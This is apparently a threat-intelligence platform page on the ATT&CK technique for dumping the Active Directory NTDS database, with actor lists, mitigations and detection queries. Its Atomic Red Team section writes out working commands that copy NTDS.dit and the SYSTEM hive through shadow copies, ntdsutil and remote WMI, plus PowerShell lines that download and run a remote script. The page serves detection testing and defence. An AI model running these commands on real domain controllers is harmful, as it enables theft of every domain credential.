Home/ATT&CK Technique/NTDS
ATT&CK Technique

NTDS

T1003.003 · credential-access

Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\NTDS\Ntds.dit of a domain controller. In addition to looking for NTDS files on active Domain Controllers, adversaries may search for backups that contain the same or similar information.

The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes. Volume Shadow Copy secretsdump.py Using the in-built Windows tool, ntdsutil.exe Invoke-NinjaCopy.

Windows

Actors Using This

14
iranAgrius
unknown_likely_russia_alignedAnubis Ransomware
chinaAPT10
russiaAPT28
chinaAPT31
iranOilRig
chinaAPT40
chinaAPT41
unknown_likely_russia_aligned_eldorado_lineageBlackLock Ransomware
unknown_likely_russia_alignedBrain Cipher
chinaChimera (G0114)
unknown_likely_russia_aligned_alphv_lineageCicada3301
russia_speaking_organized_cybercrimeDarkSide / BlackMatter
malaysia_origin_with_international_affiliatesDragonForce

Likely Attack Path

Techniques the same actors pair with this one distinctively - those showing up among actors who use this technique noticeably more than across all actors (lift > 1.15), grouped by kill-chain phase. The × is that lift multiplier; the shared-actor count is in the tooltip. A near-universal technique pairs with everything at baseline, so its list is short by design.
reconnaissance earlier
T1596 · Search Open Technical Databases ×7.00
resource-development earlier
T1584.008 · Network Devices ×4.20
execution earlier
T1569.002 · Service Execution ×5.09T1569 · System Services ×4.67
privilege-escalation earlier
T1134.001 · Token Impersonation/Theft ×4.67T1484.001 · Group Policy Modification ×4.67T1484 · Domain or Tenant Policy Modification ×4.38
credential-access same
T1558 · Steal or Forge Kerberos Tickets ×5.25
discovery later
T1069.002 · Domain Groups ×5.13T1069.001 · Local Groups ×5.09
lateral-movement later
T1550.003 · Pass the Ticket ×5.25
collection later
T1074.002 · Remote Data Staging ×4.38
exfiltration later
T1030 · Data Transfer Size Limits ×5.00T1048.002 · Exfiltration Over Asymmetric Encrypted Non-C2 Protocol ×4.67
impact later
T1531 · Account Access Removal ×4.28

Atomic Tests

11
Executable Atomic Red Team test cases for exercising this technique in a lab. Copy a command, run it on the listed platform, confirm your detections fire.
command_promptelevatedwindowsCreate Volume Shadow Copy with vssadmin
This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. 
vssadmin.exe create shadow /for=#{drive_letter}
command_promptelevatedwindowsCopy NTDS.dit from Volume Shadow Copy
This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. This test requires steps taken in the test "Create Volume Shadow Copy with vssadmin". A successful test also requires the export of the SYSTEM Registry hive. This test must be executed on a Windows Domain Controller. 
copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
command_promptelevatedwindowsDump Active Directory Database with NTDSUtil
This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of subsequent domain controllers without the need of network-based replication. Upon successful completion, you will find a copy of the ntds.dit file in the C:\Windows\Temp directory. 
mkdir #{output_folder}
ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q
command_promptelevatedwindowsCreate Volume Shadow Copy with WMI
This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. 
wmic shadowcopy call create Volume=#{drive_letter}
command_promptelevatedwindowsCreate Volume Shadow Copy remotely with WMI
This test is intended to be run from a remote workstation with domain admin context. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. 
wmic /node:"#{target_host}" shadowcopy call create Volume=#{drive_letter}
command_promptelevatedwindowsCreate Volume Shadow Copy remotely (WMI) with esentutl
This test is intended to be run from a remote workstation with domain admin context. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy created with esentutl. 
wmic /node:"#{target_host}" process call create "cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}"
powershellelevatedwindowsCreate Volume Shadow Copy with Powershell
This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. 
(gwmi -list win32_shadowcopy).Create('#{drive_letter}','ClientAccessible')
command_promptelevatedwindowsCreate Symlink to Volume Shadow Copy
This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy. 
vssadmin.exe create shadow /for=#{drive_letter}
mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
command_promptelevatedwindowsCreate Volume Shadow Copy with diskshadow
This test is intended to be run on a domain controller An alternative to using vssadmin to create a Volume Shadow Copy for extracting ntds.dit 
mkdir c:\exfil
diskshadow.exe /s #{filename}
powershellelevatedwindowsCopy NTDS in low level NTFS acquisition via MFT parsing
This test is intended to be run on a domain Controller. UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running). 
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR #{script_url} -UseBasicParsing)
Underlay-Copy -Mode MFT -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
Underlay-Copy -Mode MFT -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
powershellelevatedwindowsCopy NTDS in low level NTFS acquisition via fsutil
This test is intended to be run on a domain Controller. UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running). 
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR #{script_url} -UseBasicParsing)
Underlay-Copy -Mode Metadata -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
Underlay-Copy -Mode Metadata -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE

Mitigations

4
MITRE ATT&CK mitigations - vendor-agnostic guidance for reducing exposure to this technique.
M1017User Training

User Training involves educating employees and contractors on recognizing, reporting, and preventing cyber threats that rely on human interaction, such as phishing, social engineering, and other manipulative techniques. Comprehensive training programs create a human firewall by empowering users to be an active component of the organization's cybersecurity defenses.

Create Comprehensive Training Programs
  • Design training modules tailored to the organization's risk profile, covering topics such as phishing, password management, and incident reporting.
  • Provide role-specific training for high-risk employees, such as helpdesk staff or executives.
Use Simulated Exercises
  • Conduct phishing simulations to measure user susceptibility and provide targeted follow-up training.
  • Run social engineering drills to evaluate employee responses and reinforce protocols.
Leverage Gamification and Engagement
  • Introduce interactive learning methods such as quizzes, gamified challenges, and rewards for successful detection and reporting of threats.
Incorporate Security Policies into Onboarding
  • Include cybersecurity training as part of the onboarding process for new employees.
  • Provide easy-to-understand materials outlining acceptable use policies and reporting procedures.
Regular Refresher Courses
  • Update training materials to include emerging threats and techniques used by adversaries.
  • Ensure all employees complete periodic refresher courses to stay informed.
Emphasize Real-World Scenarios
  • Use case studies of recent attacks to demonstrate the consequences of successful phishing or social engineering.
  • Discuss how specific employee actions can prevent or mitigate such attacks.
M1026Privileged Account Management

Privileged Account Management focuses on implementing policies, controls, and tools to securely manage privileged accounts (e.g., SYSTEM, root, or administrative accounts). This includes restricting access, limiting the scope of permissions, monitoring privileged account usage, and ensuring accountability through logging and auditing.

Account Permissions and Roles
  • Implement RBAC and least privilege principles to allocate permissions securely.
  • Use tools like Active Directory Group Policies to enforce access restrictions.
Credential Security
  • Deploy password vaulting tools like CyberArk, HashiCorp Vault, or KeePass for secure storage and rotation of credentials.
  • Enforce password policies for complexity, uniqueness, and expiration using tools like Microsoft Group Policy Objects (GPO).
Multi-Factor Authentication (MFA)
  • Enforce MFA for all privileged accounts using Duo Security, Okta, or Microsoft Azure AD MFA.
Privileged Access Management (PAM)
  • Use PAM solutions like CyberArk, BeyondTrust, or Thycotic to manage, monitor, and audit privileged access.
Auditing and Monitoring
  • Integrate activity monitoring into your SIEM (e.g., Splunk or QRadar) to detect and alert on anomalous privileged account usage.
Just-In-Time Access
  • Deploy JIT solutions like Azure Privileged Identity Management (PIM) or configure ephemeral roles in AWS and GCP to grant time-limited elevated permissions.
Tools for Implementation Privileged Access Management (PAM)
  • CyberArk, BeyondTrust, Thycotic, HashiCorp Vault.
Credential Management
  • Microsoft LAPS (Local Admin Password Solution), Password Safe, HashiCorp Vault, KeePass.
Multi-Factor Authentication
  • Duo Security, Okta, Microsoft Azure MFA, Google Authenticator.
Linux Privilege Management
  • sudo configuration, SELinux, AppArmor.
Just-In-Time Access
  • Azure Privileged Identity Management (PIM), AWS IAM Roles with session constraints, GCP Identity-Aware Proxy.
M1027Password Policies

Set and enforce secure password policies for accounts to reduce the likelihood of unauthorized access. Strong password policies include enforcing password complexity, requiring regular password changes, and preventing password reuse.

Windows Systems
Use Group Policy Management Console (GPMC) to configure
  • Minimum password length (e.g., 12+ characters).
  • Password complexity requirements.
  • Password history (e.g., disallow last 24 passwords).
  • Account lockout duration and thresholds.
Linux Systems
Configure Pluggable Authentication Modules (PAM)
  • Use pam_pwquality to enforce complexity and length requirements.
  • Implement pam_tally2 or pam_faillock for account lockouts.
  • Use pwunconv to disable password reuse.
Password Managers
  • Enforce usage of enterprise password managers (e.g., Bitwarden, 1Password, LastPass) to generate and store strong passwords.
Password Blacklisting
  • Use tools like Have I Been Pwned password checks or NIST-based blacklist solutions to prevent users from setting compromised passwords.
Regular Auditing
  • Periodically audit password policies and account configurations to ensure compliance using tools like LAPS (Local Admin Password Solution) and vulnerability scanners.
Tools for Implementation Windows
  • Group Policy Management Console (GPMC): Enforce password policies.
  • Microsoft Local Administrator Password Solution (LAPS): Enforce random, unique admin passwords.
Linux/macOS
  • PAM Modules (pam_pwquality, pam_tally2, pam_faillock): Enforce password rules.
  • Lynis: Audit password policies and system configurations.
Cross-Platform
  • Password Managers (Bitwarden, 1Password, KeePass): Manage and enforce strong passwords.
  • Have I Been Pwned API: Prevent the use of breached passwords.
  • NIST SP 800-63B compliant tools: Enforce password guidelines and blacklisting.
M1041Encrypt Sensitive Information

Protect sensitive information at rest, in transit, and during processing by using strong encryption algorithms. Encryption ensures the confidentiality and integrity of data, preventing unauthorized access or tampering.

Encrypt Data at Rest
  • Use Case: Use full-disk encryption or file-level encryption to secure sensitive data stored on devices.
  • Implementation: Implement BitLocker for Windows systems or FileVault for macOS devices to encrypt hard drives.
Encrypt Data in Transit
  • Use Case: Use secure communication protocols (e.g., TLS, HTTPS) to encrypt sensitive data as it travels over networks.
  • Implementation: Enable HTTPS for all web applications and configure mail servers to enforce STARTTLS for email encryption.
Encrypt Backups
  • Use Case: Ensure that backup data is encrypted both during storage and transfer to prevent unauthorized access.
  • Implementation: Encrypt cloud backups using AES-256 before uploading them to Amazon S3 or Google Cloud.
Encrypt Application Secrets
  • Use Case: Store sensitive credentials, API keys, and configuration files in encrypted vaults.
  • Implementation: Use HashiCorp Vault or AWS Secrets Manager to manage and encrypt secrets.
Database Encryption
  • Use Case: Enable Transparent Data Encryption (TDE) or column-level encryption in database management systems.
  • Implementation: Use MySQL’s built-in encryption features to encrypt sensitive database fields such as social security numbers.

Detection Coverage

2/6 layers
Coverage across standard detection surfaces. Rows marked none have no rule of that type mapped. Some are real blind spots worth closing; others are simply not applicable to this technique (e.g. YARA matches malware files, not network behaviour).
Behavioral / log (Sigma) 23
Analytics (MITRE CAR) 2
Runtime / container (Falco) none
File / malware (YARA) none
Network (Suricata/Snort) none
Vuln scan (Nuclei) none

CAR Analytics

2
MITRE Cyber Analytics Repository - field-tested detection logic for this technique, written as pseudocode/queries you adapt to your own SIEM (Splunk, Sentinel, EQL). Each is a ready starting point for a detection rule, not just a description.
CAR-2019-08-002Low coverageActive Directory Dumping via NTDSUtil

The NTDSUtil tool may be used to dump a Microsoft Active Directory database to disk for processing with a credential access tool such as Mimikatz. This is performed by launching ntdsutil.exe as a privileged user with command line arguments indicating that media should be created for offline Active Directory installation and specifying a folder path. This process will create a copy of the Active Directory database, ntds.dit, to the specified folder path.

This requires filesystem data to determine whether files have been created.

Pseudocode - NTDSUtil - File Create
files = search File:Create
ntds_dump = filter files where (
  file_name = "ntds.dit"  and
  image_path = "*ntdsutil.exe")
output ntds_dump
Splunk - NTDSUtil - File Create
index=__your_sysmon_index__ EventCode=11 TargetFilename="*ntds.dit" Image="*ntdsutil.exe"
EQL - NTDSUtil - File Create
file where file_name == "ntds.dit" and process_name == "ntdsutil.exe"
LogPoint
norm_id=WindowsSysmon event_id=11 file="*ntds.dit" source_image="*ntdsutil.exe"
CAR-2020-05-001Low coverageMiniDump of LSASS

This analytic detects the minidump variant of credential dumping where a process opens lsass.exe in order to extract credentials using the Win32 API call MiniDumpWriteDump. Tools like SafetyKatz, SafetyDump, and Outflank-Dumpert default to this variant and may be detected by this analytic, though keep in mind that not all options for using those tools will result in this specific behavior. The analytic is based on a Sigma analytic contributed by Samir Bousseaden and written up in a blog on MENASEC.

It looks for a call trace that includes either dbghelp.dll or dbgcore.dll, which export the relevant functions/permissions to perform the dump. It also detects using the Windows Task Manager (taskmgr.exe) to dump lsass, which is described in [CAR-2019-08-001](/analytics/CAR-2019-08-001/). In this iteration of the Sigma analytic, the GrantedAccess filter isn't included because it didn't seem to filter out any false positives and introduces the potential for evasion.

This analytic was tested both in a lab and in a production environment with a very low false-positive rate. werfault.exe and tasklist.exe, both standard Windows processes, showed up multiple times as false positives.

NOTE
  • this analytic has no corresponding pseudocode implementation because the CAR data model doesn't currently support process access events.
Splunk - Lsass Process Access
index=__your_sysmon_index__ EventCode=10 TargetImage="C:\\windows\\system32\\lsass.exe" (CallTrace="*dbghelp.dll*" OR CallTrace="*dbgcore.dll*")| table _time host SourceProcessId SourceImage
LogPoint
norm_id=WindowsSysmon event_id=10 image="C:\Windows\system32\lsass.exe" call_trace IN ["*dbghelp.dll*", "*dbgcore.dll*"]
| fields log_ts host source_process_id source_image

Comply & Defend

NIST 800-53AC-02, AC-03, AC-05, AC-06, AC-16, CA-07, CM-02, CM-05, CM-06, CP-09, IA-02, IA-05, SC-28, SC-39, SI-03, SI-04, SI-07, SI-12
D3FEND9 defensive techniques
Intelligence Graph · click any node to traverse
CVETechnique ActorTool Family
drag to reposition · click any node to traverse · button top-right enlarges
External lookups - second-class, for what we don’t hold ourselves
MITRE ATT&CKAtomic Red Teamcar (MITRE)
Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities
Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs
Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures
Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1
About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin